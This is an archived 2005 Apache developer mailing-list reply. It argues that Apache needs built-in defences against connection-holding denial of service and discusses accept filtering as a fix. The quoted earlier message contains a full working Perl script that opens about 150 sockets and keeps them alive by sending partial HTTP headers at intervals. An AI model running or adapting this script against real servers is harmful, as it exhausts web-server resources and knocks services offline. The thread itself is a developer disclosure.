httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Ivan Barrera A." <Br...@Ivn.cl>
Subject Re: Timeout for requests
Date Tue, 03 May 2005 20:32:47 GMT
> 
> 
> How does accept filtering not 'fix' this?  If the http accept filter
> enabled on FreeBSD, Apache will never even see those bogus requests.
> 

How about linux ? how about Windows ? how about (put your favorite OS
here) ?

Well.. First time i heard about httpready (which looks really nice).
I've been looking for something like this.. how come nobody mention it
before ?

And final, why can't apache itself have some decent DoS avoiding feature
? not always there will be 3┬║rd party tools to help on that..


> 
> 
>>Rasmus Lerdorf wrote:
>>
>>
>>>Turn on accept filtering and this problem goes away.  Or at least it
>>>moves to be a kernel-level issue instead of an Apache one.
>>>
>>>-Rasmus
>>>
>>>Ivan Barrera A. wrote:
>>>
>>>
>>>
>>>>Hi...
>>>>
>>>>I'm still fighting (probably for a lost cause.. but my boss ask me to
>>>>do this).
>>>>In the socket activity there are some troubles dealing with timeouts.
>>>>It is pretty easy to Anyone DoS any apache webserver.
>>>>I want to propose implementing a request timeout time, or at least a
>>>>check for incoming data.
>>>>
>>>>If you open many sockets to an apache server, you can keep it alive,
>>>>and make apache keep it open for a looong time, eating resources. If you
>>>>limit the numbers of conecctions per ip, you still can DoS apache using
>>>>2 or more other ips.
>>>>
>>>>All this was tedtes with Timeout set to 20, KeepAlive set to 5, and all
>>>>relevant options to their lowest value.
>>>>
>>>>
>>>>(one of the common scrips used to kill apache, is apache-squ1rt, i use
>>>>this other to test)
>>>>Use this perl script to test :
>>>>
>>>>#!/usr/bin/perl
>>>>
>>>>my $Child = 150;
>>>>my $Sleep = 10;
>>>>
>>>>use IO::Socket;
>>>>use strict;
>>>>
>>>>my($c);
>>>>my(@SOCKET);
>>>>my($t);
>>>>
>>>>local $| = 1;
>>>>
>>>>$c=0;
>>>>for(0..$Child) {
>>>> @SOCKET[$c] = new IO::Socket::INET( Proto   => "tcp",
>>>>                                           PeerAddr=> "127.0.0.1:80");
>>>> $c++;
>>>>}
>>>>
>>>>for(0..$Child) {
>>>> if ( defined @SOCKET[$c]) {
>>>>   $t = @SOCKET[$c];
>>>>   print $t "GET / HTTP/1.1";
>>>> }
>>>>}
>>>>
>>>>
>>>>while(1){
>>>> $c=0;
>>>> # For each children
>>>> for(0..$Child) {
>>>>   if ( defined @SOCKET[$c]) {
>>>>     $t = @SOCKET[$c];
>>>>     print $t "host: test.test";
>>>>   }
>>>>   $c++;
>>>> }
>>>> sleep ($Sleep);
>>>>}
>>>>
>>>>$c=0;
>>>>for(0..$Child) {
>>>> close(@SOCKET[$c++]);
>>>>}
>>>
>>>
>>>
> 
> 

Mime
View raw message